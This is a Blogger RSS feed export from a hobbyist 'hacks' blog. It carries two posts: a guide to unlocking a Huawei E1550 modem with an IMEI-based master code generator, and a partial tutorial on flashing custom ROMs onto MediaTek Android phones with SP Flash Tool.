<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>snacKs of hacKs</title><description>Hacks for beginners, script kiddies, security tips, facebook hacks, facts etc..,</description><managingEditor>noreply@blogger.com (Anonymous)</managingEditor><pubDate>Fri, 25 Oct 2024 06:09:47 +0530</pubDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">45</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><link>https://snacksofhacks.blogspot.com/</link><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle>Hacks for beginners, script kiddies, security tips, facebook hacks, facts etc..,</itunes:subtitle><itunes:category text="Education"><itunes:category text="Educational Technology"/></itunes:category><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><title>Unlock Huawei modem E1550</title><link>https://snacksofhacks.blogspot.com/2013/02/unlock-huawei-modem.html</link><category>TeCh</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Fri, 8 Dec 2017 12:13:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-1189078891432808303</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h4 style="text-align: left;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc2Hd_D3iYwj7GGffhJ3toFVxf145-0aB1b2YC1cjC5ATEf7Xp0TSqfB3Xm5ch1RA9_SbIZ4T672C8dDsiMoc0xvG_GNQLlLNzvTc-PO6i2fklE211uKcvxrGh2S_owjLDKLqKIkaLsPM/s1600/1339051441_393893262_1-IDEA-HUAWEI-3G-E1550-36mbps-USB-MODEM-UNLOCKED-BRAND-NEW-Bapunagar.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="318" data-original-width="502" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc2Hd_D3iYwj7GGffhJ3toFVxf145-0aB1b2YC1cjC5ATEf7Xp0TSqfB3Xm5ch1RA9_SbIZ4T672C8dDsiMoc0xvG_GNQLlLNzvTc-PO6i2fklE211uKcvxrGh2S_owjLDKLqKIkaLsPM/s320/1339051441_393893262_1-IDEA-HUAWEI-3G-E1550-36mbps-USB-MODEM-UNLOCKED-BRAND-NEW-Bapunagar.jpg" width="320" /&gt;&lt;/a&gt;&lt;span style="font-size: large;"&gt;H&lt;/span&gt;&lt;b&gt;i,friends today i'm gonna show you how to unlock your HUAWEI DEVICE.&lt;/b&gt;&lt;/h4&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-size: medium;"&gt;This an easy to use software work and it take only 10-15 mins.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h4 style="text-align: left;"&gt;
&lt;div class="&amp;quot;heading" style="background-color: white; border: 0px; color: #111111; font-family: Georgia, Times, 'Times New Roman', serif; font-weight: normal; line-height: 25px; margin-bottom: 24px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
&lt;strong style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/strong&gt;
&lt;strong style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/strong&gt;
&lt;strong style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/strong&gt;
&lt;strong style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/strong&gt;
&lt;strong style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Huawei&amp;nbsp;E1550&amp;nbsp;Features&lt;/strong&gt;&lt;/div&gt;
&lt;ol style="background-color: white; border: 0px; color: #111111; font-family: Georgia, Times, 'Times New Roman', serif; font-weight: normal; line-height: 23px; list-style-image: initial; list-style-position: initial; margin: 0px 0px 24px 1.5em; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
&lt;li style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;3G Modem Huawei&amp;nbsp;E1550&lt;/li&gt;
&lt;li style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Micro SD Card Slot&lt;/li&gt;
&lt;li style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Support data statistics&lt;/li&gt;
&lt;li style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;3.26 HSDPA 3G Modem&lt;/li&gt;
&lt;li style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;HSDPA/UMTS (2100MHz/1900Mhz/850Mhz)&lt;/li&gt;
&lt;li style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;GSM/GPRS/EDGE (850/900/1800/1900MHz)&lt;/li&gt;
&lt;li style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Support 3.6Mbps HSDPA services&lt;/li&gt;
&lt;li style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Micro SD Card Slot&lt;/li&gt;
&lt;li style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Support SMS services&lt;/li&gt;
&lt;li style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Support data statistics&lt;/li&gt;
&lt;li style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Receive diversity (2100MHz)&lt;/li&gt;
&lt;li style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Plug &amp;amp; Play&lt;/li&gt;
&lt;li style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Support Windows2000/ XP/Vista,Win7 ,Mac&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;b style="font-size: x-large;"&gt;Require ments &lt;/b&gt;&lt;span style="font-size: medium;"&gt;: Huawei E1550 Firmware,Universal master code.&lt;/span&gt;&lt;/div&gt;
&lt;/h4&gt;
&lt;span style="font-size: medium;"&gt;You can download this software from&amp;nbsp;&lt;a href="http://adf.ly/EhUKF" target="_blank"&gt;Here&lt;/a&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;and Universal master code from&amp;nbsp;&lt;a href="http://www.stumbleupon.com/su/4X5BDS/download.myusbmodem.com/download.php?file=/Huawei%20Unlocking%20Tools/Universal_MasterCode.exe&amp;amp;start=1" target="_blank"&gt;Here&lt;/a&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;u&gt;&lt;span style="color: #e06666;"&gt;&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;times&amp;quot; , &amp;quot;times new roman&amp;quot; , serif; line-height: 25px; text-align: justify;"&gt;Before starting unlocking process there few things which you should take into account, first is to make sure that your data card is detected in your desktop/laptop and another thing is you must have firmware of the huawei&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;e1550&lt;/span&gt;&lt;span style="background-color: white; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;times&amp;quot; , &amp;quot;times new roman&amp;quot; , serif; line-height: 25px; text-align: justify;"&gt;&amp;nbsp;with you. You should know your IMEI number (IMEI number is a 15 Digit number you will find printed on the device). So now just follow below step by step guide to how to unlock huawei e1550data card.&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;br /&gt;
&lt;u&gt;&lt;span style="background-color: white; color: #111111; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;times&amp;quot; , &amp;quot;times new roman&amp;quot; , serif; line-height: 25px; text-align: justify;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;
&lt;u&gt;&lt;span style="background-color: white; color: #111111; font-family: &amp;quot;georgia&amp;quot; , &amp;quot;times&amp;quot; , &amp;quot;times new roman&amp;quot; , serif; line-height: 25px; text-align: justify;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;
&lt;span style="font-size: medium;"&gt;Then follow these simple steps:&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;&lt;span style="color: orange;"&gt;1&lt;/span&gt;.Connect your device to com port and comform that it is detectable,no need to remove sim.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;&lt;span style="color: orange;"&gt;2&lt;/span&gt;.Open your UNIVERSAL MASTER CODE generator and enter your device's IMEI number.It will generate two different codes &lt;u&gt;Flash code&lt;/u&gt; and &lt;u&gt;Unlock code,&lt;/u&gt;&lt;/span&gt;&lt;span style="font-size: medium;"&gt;note down these codes.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;&lt;span style="color: orange;"&gt;3&lt;/span&gt;.Open your Huawei E1550 software and it will find your device and starts processing.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;&lt;span style="color: orange;"&gt;4&lt;/span&gt;.Continue to the steps which will be shown and wait for the process.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;&lt;span style="color: orange;"&gt;5&lt;/span&gt;.When it asks for unlock code give your Flash code or unlock code&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;and wait for 5-10 min.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;&lt;span style="color: orange;"&gt;6&lt;/span&gt;.Your device is unlock and set free to use any network.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;&lt;span style="color: orange;"&gt;7&lt;/span&gt;.If you want to change your dashboard download Mobile partner&amp;nbsp; from&amp;nbsp;&lt;a href="http://www.stumbleupon.com/su/1XjGHx/download.myusbmodem.com/download.php?file=/Huawei%20Dashboards/Update%20Wizards/Customized%20Mobile%20Partner.7z&amp;amp;start=1" target="_blank"&gt;Here&lt;/a&gt;&amp;nbsp;, install it and open it from desktop shortcut and give your unlock code produced earlier.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;&lt;span style="color: orange;"&gt;8&lt;/span&gt;.Then set APN settings for your network provider and try to connect to internet.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;Thanks for reading my post.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: medium;"&gt;&lt;b&gt;If any problem persists feel free to ask me in comments section,take time to like and share&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: medium;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="" style="clear: both; text-align: center;"&gt;
&lt;span style="font-size: medium;"&gt;Your &lt;span style="color: orange;"&gt;blogger&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" style="background-color: transparent; border: 0px !important;"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: medium;"&gt;____----&lt;span style="color: #45818e;"&gt;Our&lt;/span&gt; &lt;span style="color: #6aa84f;"&gt;hack&lt;/span&gt;&lt;span style="color: #45818e;"&gt; is yours&lt;/span&gt;----____&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc2Hd_D3iYwj7GGffhJ3toFVxf145-0aB1b2YC1cjC5ATEf7Xp0TSqfB3Xm5ch1RA9_SbIZ4T672C8dDsiMoc0xvG_GNQLlLNzvTc-PO6i2fklE211uKcvxrGh2S_owjLDKLqKIkaLsPM/s72-c/1339051441_393893262_1-IDEA-HUAWEI-3G-E1550-36mbps-USB-MODEM-UNLOCKED-BRAND-NEW-Bapunagar.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><title>How to Flash your Android(MTK) Mobile the easy way</title><link>https://snacksofhacks.blogspot.com/2017/12/how-to-flash-your-androidmtk-easy.html</link><category>Android</category><category>Custom ROM</category><category>Flashing</category><category>MTK device</category><category>Smartphone</category><category>SP Flash Tool</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Fri, 8 Dec 2017 11:33:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-3077628791722847069</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYDWFf4gZS0in6Dv72i43JiATSjbF_2wlJvOevE7xvf3qHcNRv5oOkygf-gbxgI8yIDSbm6hlTSSIvl2C9NXsYQW7CJ5VP3KfYZSmFIo9iIv68H9vMvuPiBf6LuwHOVlJhgHUDH7JeSbg/s1600/flash-custom-rom-on-android_2.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;span style="font-size: small;"&gt;&lt;img border="0" data-original-height="317" data-original-width="600" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYDWFf4gZS0in6Dv72i43JiATSjbF_2wlJvOevE7xvf3qHcNRv5oOkygf-gbxgI8yIDSbm6hlTSSIvl2C9NXsYQW7CJ5VP3KfYZSmFIo9iIv68H9vMvuPiBf6LuwHOVlJhgHUDH7JeSbg/s320/flash-custom-rom-on-android_2.jpg" width="320" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYDWFf4gZS0in6Dv72i43JiATSjbF_2wlJvOevE7xvf3qHcNRv5oOkygf-gbxgI8yIDSbm6hlTSSIvl2C9NXsYQW7CJ5VP3KfYZSmFIo9iIv68H9vMvuPiBf6LuwHOVlJhgHUDH7JeSbg/s1600/flash-custom-rom-on-android_2.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: center;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;H&lt;/span&gt;&lt;/b&gt;ello, "My blog readers"..&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;It's been too long that I've posted &amp;nbsp;any posts in this blog, b'coz I was seriously working on some other projects and working on some new skills.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;Anyways let's this tutorial on how to flash your Android - The easy way&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;span style="color: #990000;"&gt;Note&lt;/span&gt;: This is a strict advice that if you don't have any proper experience with the mobile bricking, please do some research but if you unfortunately make your mobile dead... &lt;span style="color: #cc0000;"&gt;I'm not responsible♥&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #cc0000; font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: #cc0000; font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;So, let's start the tutorial....&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;h4 style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;These are the things you're gonna need:&lt;/span&gt;&lt;/h4&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;1.&amp;nbsp;&lt;a href="https://drive.google.com/file/d/0B92f1G7iMBQ2bThaRGhyODNQRjQ/view?usp=sharing" target="_blank"&gt;SP Flash Tool V2&lt;/a&gt;&amp;nbsp;- You can find the latest version &lt;a href="http://www.spflashtool.com/" target="_blank"&gt;here&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;2.&amp;nbsp;&lt;a href="https://drive.google.com/file/d/0B92f1G7iMBQ2OXFSQ2Y3Y3ZMcG8/view?usp=sharing" target="_blank"&gt;Drivers setup&lt;/a&gt;&amp;nbsp;- To identify your device, you'll get to know about it later in the tutorial&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;3. Any Android Mobile - Compatible USB cable&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;4. Computer with windows 7 &amp;nbsp;or later&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;5. Custom ROM files for your Android Mobile - You can find it &lt;a href="https://www.techrrival.com/select-best-custom-rom-android/" target="_blank"&gt;here&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h4 style="text-align: left;"&gt;
&lt;b&gt;&lt;u&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;Step 1 :&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;First, before you install SP Flash tool you need to configure your PC to enable connectivity&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="color: #38761d; font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;ASSUMING YOU'RE &amp;nbsp;USING WINDOWS 10&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;Go to Settings &amp;gt; Update and Security &amp;gt; Recovery &amp;gt; Advanced Startup &amp;gt; Restart Now &amp;nbsp;( Wait, see the below steps first, so that you can prepare yourself for the next steps)&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEileoCukpmHNd4_xkOKuLwZRBp1GwvbFKsX_4c1kRRSv3bbfa4XH1M-UI-98oADQ_yGhwTxgNNT5kXzVWnMIy7M24-qTu3nJxLYaxBV-JSIGyQ9EtDljOriaAelvKcid6phkKPllgS5E70/s1600/settings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="467" data-original-width="971" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEileoCukpmHNd4_xkOKuLwZRBp1GwvbFKsX_4c1kRRSv3bbfa4XH1M-UI-98oADQ_yGhwTxgNNT5kXzVWnMIy7M24-qTu3nJxLYaxBV-JSIGyQ9EtDljOriaAelvKcid6phkKPllgS5E70/s640/settings.png" width="640" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZVRY0uoljDlgV4-cx7IN1WE2ngFVejbfIxtNtPtOM3OrhnCoXhehK0xaXqk5_FDpLYSgA8tmm0ODZ9l6FeLAtHs-ZEnYrJKByKPSrmTeXlhyy23SrwHQZloxA6gZztXOotYrk6ddBvrE/s1600/settings2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="493" data-original-width="966" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZVRY0uoljDlgV4-cx7IN1WE2ngFVejbfIxtNtPtOM3OrhnCoXhehK0xaXqk5_FDpLYSgA8tmm0ODZ9l6FeLAtHs-ZEnYrJKByKPSrmTeXlhyy23SrwHQZloxA6gZztXOotYrk6ddBvrE/s640/settings2.png" width="640" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuw0etgPIpU1ej5o6h-DdxObwdYX2x6tFtiEF9y4DDJBRza5Vd0irqX2kzB0R2XIMCmZq2tPR6wiqV-D0IjsRtSil5KvlZbgfKbPT9IrBs5Wl230cBwnltusUGdDlFWvj-dq_xT5vM4WA/s1600/settings3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="527" data-original-width="1015" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuw0etgPIpU1ej5o6h-DdxObwdYX2x6tFtiEF9y4DDJBRza5Vd0irqX2kzB0R2XIMCmZq2tPR6wiqV-D0IjsRtSil5KvlZbgfKbPT9IrBs5Wl230cBwnltusUGdDlFWvj-dq_xT5vM4WA/s640/settings3.png" width="640" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLnqSZhZBXMcONVyXHrn8t1GcV5LOsMhbqrONIwiPSDXorIOoot5_kvSBYpDN8N3Ss6EueAOW0vBmyoF6MVIivvT4t_clclgJ3oOqIZObDZIgxW9kvs6j-ofvv8gzKOdHjeAf2xxhdVMY/s1600/settings4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="519" data-original-width="950" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLnqSZhZBXMcONVyXHrn8t1GcV5LOsMhbqrONIwiPSDXorIOoot5_kvSBYpDN8N3Ss6EueAOW0vBmyoF6MVIivvT4t_clclgJ3oOqIZObDZIgxW9kvs6j-ofvv8gzKOdHjeAf2xxhdVMY/s640/settings4.png" width="640" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie8XBpys69QZ8Pko0pLw2YyfqC4nRddQQfEoTF1laDgXd0bsn5PaHleNuobva1oN0icf6EJh0kF3mD006WKdyML-z4Tk7JrsM-ARz7Q9-7YjBXge36SbGd53AFqM6c-xIH6p6alBz4GLg/s1600/settings5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="506" data-original-width="940" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie8XBpys69QZ8Pko0pLw2YyfqC4nRddQQfEoTF1laDgXd0bsn5PaHleNuobva1oN0icf6EJh0kF3mD006WKdyML-z4Tk7JrsM-ARz7Q9-7YjBXge36SbGd53AFqM6c-xIH6p6alBz4GLg/s640/settings5.png" width="640" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha5EBYLbUUCWYHlWxW5LxM1zYyNpIFnGFlPTyQNDnfGKOBbpXmQsiFSWBEBNe8fXOvYVg25VADWQUBUmtSJ_U4355xl_-DYx08GUOYBBVrbI4CTFDLZq0qgPGBsHhAuEEdfSmPdCLrH80/s1600/settings6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif; font-size: small;"&gt;&lt;img border="0" data-original-height="522" data-original-width="968" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha5EBYLbUUCWYHlWxW5LxM1zYyNpIFnGFlPTyQNDnfGKOBbpXmQsiFSWBEBNe8fXOvYVg25VADWQUBUmtSJ_U4355xl_-DYx08GUOYBBVrbI4CTFDLZq0qgPGBsHhAuEEdfSmPdCLrH80/s640/settings6.png" width="640" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
